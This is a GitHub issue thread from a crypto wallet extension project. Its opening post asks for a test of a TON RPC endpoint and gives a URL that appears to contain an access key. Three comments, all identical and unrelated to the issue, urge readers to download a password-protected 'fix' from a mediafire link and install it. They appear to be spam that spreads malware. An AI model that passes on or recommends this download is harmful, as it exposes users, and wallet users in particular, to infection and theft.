### ISSUE TITLE
Test TON RPC

### ISSUE THREAD

**Issue by bluezdot** [Koniverse/SubWallet-Extension#3523]
**Is your feature request related to a problem? Please describe.**
- Test TON RPC: https://go.getblock.io/e6f82f97ee0f4343bb92bcf901f7f7d7/jsonRPC

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
